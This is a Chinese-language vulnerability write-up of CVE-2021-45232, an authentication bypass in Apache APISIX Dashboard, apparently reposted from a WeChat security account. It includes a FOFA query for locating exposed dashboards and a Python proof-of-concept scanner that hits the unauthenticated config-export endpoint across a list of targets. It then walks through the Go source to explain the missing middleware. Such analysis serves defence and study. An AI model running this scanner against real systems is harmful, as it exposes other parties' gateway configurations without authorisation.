简介
漏洞描述
Apache APISIX是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard使用户可通过前端界面操作Apache APISIX。
该漏洞的存在是由于 Manager API 中的错误。Manager API在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕过身份验证。
FOFA 查询
title="Apache APISIX Dashboard"影响范围
Apache APISIX Dashboard < 2.10.1
漏洞分析
import requestsimport sysfilename = sys.argv[1]print(filename)target = open(filename, 'r')f = open('result.txt', 'w')target_list = target.readlines()for url in target_list:url = url.strip()payload = url + '/apisix/admin/migrate/export'try:rsp = requests.get(url=payload, verify=False, timeout=2)except:print('%s验证失败!'%url)continueelse:rsp_s = rsp.textif "Counsumers" in rsp_s:print("%s存在漏洞!" % url)f.writelines(url + '存在漏洞!n')else:print("%s不存在漏洞!" % url)f.close()target.close()
根据POC可知漏洞产生于 /apisix/admin/migrate/export 这个接口,我们直接定位其对应的路由处理器分析
由上图可知,该 API 对应的处理器是 api/internal/handler/migrate/migrate.go:52 这里的 ExportConfig 方法
分析该处理器方法逻辑,得知大体逻辑为:
(1)调用 Export 方法获取数据;
(2)回显写数据。
注意这里 ExportConfig 方法的上下文参数是 gin.Context ,而不是 droplet.Contet ,也就是漏洞产生的原因,因为这里面 gin 注册的中间件并没有鉴权
继续跟入 Export 方法分析,阅读代码大体逻辑不难发现这里遍历数据并序列化返回
至此整个漏洞过程就分析完毕了,我们再来看看安全的API鉴权实现。
鉴权实现
在API项目目录下的 internal 目录下存在一个名为 filter 的目录,该目录下存放所有的中间件,其中存在一个名为 authentication 的GO文件
该中间件便是鉴权的实现
查看使用该中间件的地方
回到main函数,也就是程序的入口点分析
跟入 Execute 方法发现其方法实现为 rootCmd 这个全局变量所在Go文件,这里方法的底层调用的是 rootCmd 这个全局变量的 execute 方法
在这完成了鉴权中间件的挂载。
原文始发于微信公众号(安全之道):CVE-2021-45232漏洞分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论